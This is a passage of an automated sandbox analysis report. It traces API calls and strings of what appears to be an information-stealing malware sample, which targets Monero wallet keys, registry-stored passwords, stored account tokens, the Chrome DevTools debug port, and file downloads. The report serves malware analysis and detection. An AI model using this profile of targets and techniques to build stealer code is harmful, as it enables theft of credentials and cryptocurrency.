                              • Part of subcall function 00F312A0: RegCloseKey.ADVAPI32(?), ref: 00F312FF
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3134F
                            • lstrlen.KERNEL32(?), ref: 00F3135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00F31377
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00F31465
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F3A13C
                              • Part of subcall function 00F3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F3A161
                              • Part of subcall function 00F3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00F3A181
                              • Part of subcall function 00F3A110: ReadFile.KERNEL32(000000FF,?,00000000,00F3148F,00000000), ref: 00F3A1AA
                              • Part of subcall function 00F3A110: LocalFree.KERNEL32(00F3148F), ref: 00F3A1E0
                              • Part of subcall function 00F3A110: CloseHandle.KERNEL32(000000FF), ref: 00F3A1EA
                            • DeleteFileA.KERNEL32(00000000), ref: 00F314EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 4d2eeae6e1dfdf79f718632cb90045aaf42fb0099ce669a875b18fb45043fd22
                            • Instruction ID: 894ee3fd71bebb9ab89398d26f238f7678825582b598657a731f98436f6b0bbb
                            • Opcode Fuzzy Hash: 4d2eeae6e1dfdf79f718632cb90045aaf42fb0099ce669a875b18fb45043fd22
                            • Instruction Fuzzy Hash: 7C5173B1D501189BDB15FB60DCA6FED773CAB50300F4045D8BB0A62082EE346B89DBA6
                            APIs
                            • InternetOpenA.WININET(00F50AF6,00000001,00000000,00000000,00000000), ref: 00F39A6A
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00F39AAB
                            • InternetCloseHandle.WININET(00000000), ref: 00F39AC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Open$CloseHandle
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 3289985339-2144369209
                            • Opcode ID: 0ac3181af951a8eff2b8be30758b0b50710aaf84aae0d80308886c35cad5e775
                            • Instruction ID: f0dc5690f052a350fb4621f4db315761772db0f389c4fd1b77f0cec929941fb9
                            • Opcode Fuzzy Hash: 0ac3181af951a8eff2b8be30758b0b50710aaf84aae0d80308886c35cad5e775
                            • Instruction Fuzzy Hash: 25414F35A10258EBDB14EF90DC95FDDB778BB48750F104154FA49AB180CBB4AE84EF60
                            APIs
                              • Part of subcall function 00F37330: memset.MSVCRT ref: 00F37374
                              • Part of subcall function 00F37330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F3739A
                              • Part of subcall function 00F37330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F37411
                              • Part of subcall function 00F37330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F3746D
                              • Part of subcall function 00F37330: GetProcessHeap.KERNEL32(00000000,?), ref: 00F374B2
                              • Part of subcall function 00F37330: HeapFree.KERNEL32(00000000), ref: 00F374B9
                            • lstrcat.KERNEL32(00000000,00F5192C), ref: 00F37666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F376A8
                            • lstrcat.KERNEL32(00000000, : ), ref: 00F376BA
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F376EF
                            • lstrcat.KERNEL32(00000000,00F51934), ref: 00F37700
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00F37733
                            • lstrcat.KERNEL32(00000000,00F51938), ref: 00F3774D
                            • task.LIBCPMTD ref: 00F3775B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 8c240bb20cea4eabda589ec6c851751a54347728b6b2c94eabad9309209a65d2
                            • Instruction ID: 4b851ee55e26a42a1d2acadec9f2256f92578712a8819da457bdea81fb630b40
                            • Opcode Fuzzy Hash: 8c240bb20cea4eabda589ec6c851751a54347728b6b2c94eabad9309209a65d2
                            • Instruction Fuzzy Hash: D13172B6D00208DFDB15EBE0ECA9DFF7779AB44311F104208F542A3296DA38B946EB51
                            APIs
                            • memset.MSVCRT ref: 00F37374
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00F3739A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00F37411
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00F3746D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F374B2
                            • HeapFree.KERNEL32(00000000), ref: 00F374B9
                            • task.LIBCPMTD ref: 00F375B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 96bd7a4f59d7fa7ed2a4a5059f1fa482efade2add107d4b9ec359eb0fc34c465
                            • Instruction ID: ab642e8bf779ce2fd07399f24e6138b55e2bbec47960ca9fbeaf7a677ddd8296
                            • Opcode Fuzzy Hash: 96bd7a4f59d7fa7ed2a4a5059f1fa482efade2add107d4b9ec359eb0fc34c465
                            • Instruction Fuzzy Hash: 83613EB1D0425C9BDB24DB50CC45BDAB7B8BF44310F0081E9E649A6241DFB4ABC9DF90
                            APIs
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                            • wsprintfA.USER32 ref: 00F39E7F
                            • memset.MSVCRT ref: 00F39EED
                            • lstrcat.KERNEL32(00000000,?), ref: 00F39F03
                            • lstrcat.KERNEL32(00000000,?), ref: 00F39F17
                            • lstrcat.KERNEL32(00000000,00F512D8), ref: 00F39F29
                            • lstrcpy.KERNEL32(?,00000000), ref: 00F39F7C
                            • memset.MSVCRT ref: 00F39F9C
                            • Sleep.KERNEL32(00001388), ref: 00F3A013
                              • Part of subcall function 00F499A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00F499C5
                              • Part of subcall function 00F499A0: Process32First.KERNEL32(00F3A056,00000128), ref: 00F499D9
                              • Part of subcall function 00F499A0: Process32Next.KERNEL32(00F3A056,00000128), ref: 00F499F2
                              • Part of subcall function 00F499A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F49A4E
                              • Part of subcall function 00F499A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00F49A6C
                              • Part of subcall function 00F499A0: CloseHandle.KERNEL32(00000000), ref: 00F49A79
                              • Part of subcall function 00F499A0: CloseHandle.KERNEL32(00F3A056), ref: 00F49A88
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                            • String ID: D
                            • API String ID: 3242155833-2746444292
                            • Opcode ID: 6f1b93775312835ff51661e110b485873a23482e3981d43e0455beb0aa67a520
                            • Instruction ID: 2c608fb82093d31807c052742f79e90fb17beeae5042d7b36681f28d1c4e7665
                            • Opcode Fuzzy Hash: 6f1b93775312835ff51661e110b485873a23482e3981d43e0455beb0aa67a520
                            • Instruction Fuzzy Hash: B85188B1D443189BEB24DB60DC4AFDE7778AB44700F004598B60DA72C1EB75AB88DF51
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                            • InternetOpenA.WININET(00F50DFB,00000001,00000000,00000000,00000000), ref: 00F3615F
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F36197
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00F361DF
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00F36203
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00F3622C
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F3625A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00F36299
                            • InternetCloseHandle.WININET(?), ref: 00F362A3
                            • InternetCloseHandle.WININET(00000000), ref: 00F362B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 9ea08b06b12218cd1fcad941c3e1d4735531b76029a1690314fcc4292c0caa53
                            • Instruction ID: 5118cdf3f5535dab80279b96f0eedf58b0c491e480037778e6e5144ec95bfbf7
                            • Opcode Fuzzy Hash: 9ea08b06b12218cd1fcad941c3e1d4735531b76029a1690314fcc4292c0caa53
                            • Instruction Fuzzy Hash: 365193B1A40218ABEF20DF90DC49FEE7779AB44315F008198F605A71C1DB74AA89DFA5
                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 00FB024D
                            • ___TypeMatch.LIBVCRUNTIME ref: 00FB035B
                            • CatchIt.LIBVCRUNTIME ref: 00FB03AC
                            • CallUnexpected.LIBVCRUNTIME ref: 00FB04C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2356445960-393685449
                            • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction ID: 4a0a2fb2fa1f1cee4004586780fe2a2c49a0b4ac21f24e89a75e7ce81c33a6e9
                            • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                            • Instruction Fuzzy Hash: A5B19875C00209EFCF29DFA6C8859EFBBB5BF04320B14416AE9116B212DB34DA55EF91
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            • lstrlen.KERNEL32(00000000), ref: 00F3BC6F
                              • Part of subcall function 00F48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F48FE2
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 00F3BC9D
                            • lstrlen.KERNEL32(00000000), ref: 00F3BD75
                            • lstrlen.KERNEL32(00000000), ref: 00F3BD89
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: fb671232e04b338b17555feafd3a34788603ce2154cc2f445b85ccf7c904a515
                            • Instruction ID: 69fa7ed5e044d13c539057bdf546ba39c42e4234e54c6efa4a497a836a6c4bd7
                            • Opcode Fuzzy Hash: fb671232e04b338b17555feafd3a34788603ce2154cc2f445b85ccf7c904a515
                            • Instruction Fuzzy Hash: 59B171729501189BDB15FBA0DCA6EEE7B39FF54304F404558F90662092EF38AA48DB72
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmpDownload File
